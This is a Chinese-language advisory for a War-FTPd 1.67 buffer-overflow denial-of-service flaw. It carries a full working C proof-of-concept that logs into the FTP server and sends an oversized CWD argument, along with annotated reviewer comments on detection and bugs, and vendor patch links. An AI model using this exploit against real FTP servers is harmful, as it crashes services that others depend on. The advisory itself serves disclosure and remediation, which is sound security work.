War-FTPd 1.6x CWD/MKD 拒绝服务漏洞
发布日期:2000-02-04
更新日期:2000-02-04
受影响系统:
Jgaa WarFTPd 1.67-3
Jgaa WarFTPd 1.66x4s
不受影响系统:
Jgaa WarFTPd 1.71
Jgaa WarFTPd 1.67-4
描述:
来源:Toshimi Makino <crc@sirius.imasy.or.jp>
War-FTPd 1.67及以前版本容易受到缓冲区溢出拒绝服务攻击。
由于程序代码在处理MKD和CWD命令时缺乏边界检查,通过向这两个命令传送超长的路径名作为参数时可远程使服务器崩溃。
测试方法:
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
/*
 * Entry point of the proof-of-concept.
 *
 * Flow as written: open a TCP connection to argv[1] on port FTP_PORT (21),
 * read and discard the greeting, send "USER argv[2]" and "PASS argv[3]",
 * then send a single CWD command whose argument is MAXBUF-1 bytes of 0x90,
 * pause briefly and close the socket. The advisory above describes the
 * effect on an unpatched War-FTPd as a crash (denial of service); the
 * program reads no reply to the CWD and does nothing afterwards.
 *
 * Reviewer notes (defensive reading of this tool):
 *  - The usage check accepts argc == 3, but argv[3] is read below as the
 *    password; with exactly three arguments that is the NULL that
 *    terminates argv, so the check should have been "argc < 4".
 *  - recv()/send() return values are never inspected, and the sprintf()
 *    calls into packetbuf are not bounded by the lengths of argv[2]/argv[3].
 *  - WSACleanup() is registered with atexit() and also called explicitly
 *    before returning, so it runs twice on the normal path.
 *  - Detection/mitigation: the observable on the wire is an FTP CWD (or
 *    MKD, per the advisory) command with a multi-kilobyte argument; the
 *    fix is the vendor build 1.67-4 or 1.71 listed under 建议 below.
 */
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
/* static: presumably to keep the 8 KB / 32 KB buffers off the stack. q is declared but never used. */
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
hostent *victimhostent;
WSADATA wsa;
/* Off by one: the usage line names three arguments, but only two are required here (see header note). */
if (argc < 3){
printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
}
/* Request Winsock 1.1. */
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
/* WSACleanup is registered before the WSAStartup result is checked, so it also runs at exit on the failure path. */
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.\n"); exit(-1);
}
/* Try the target as a dotted-quad first; inet_addr() returns INADDR_NONE (all bits set) otherwise,
   which is why comparing the unsigned result against -1 works. */
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
}
else
/* Takes the first resolved address as a 4-byte IPv4 value; h_addr_list[0] is not checked for NULL. */
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
/* Any connect() failure is reported as "Connection refused", whatever the actual cause. */
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.\n"); exit(-1);
}
printf("Attacking war-ftpd ...\n");
/* Read and discard the server greeting; the reply is never parsed. */
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* Plain FTP login. Neither sprintf() is bounded by the length of the argv string it formats. */
sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* argv[3] is NULL when the program is run with exactly three arguments (see header note). */
sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* Build the over-long path: MAXBUF-1 bytes of 0x90 followed by a NUL. 0x90 is the x86 NOP opcode,
   but this program sends no code and the advisory describes only a crash. */
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
/* The single CWD command that triggers the missing bounds check described in the advisory. */
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
/* Presumably gives the server time to read the command before the socket is torn down — TODO confirm. */
Sleep(100);
/* 2 == SD_BOTH: stop both directions before closing. */
shutdown(sock, 2);
closesocket(sock);
/* Explicit cleanup here plus the atexit() registration above means WSACleanup() runs twice. */
WSACleanup();
printf("done.\n");
}
建议:
1.67-4版本已修补了这个漏洞,下载网址:
http://war.jgaa.com/alert/files/ward167-4.zip
另外,升级到1.71版本也能修补这个漏洞,下载网址:
http://war.jgaa.com/alert/files/ward171-0.zip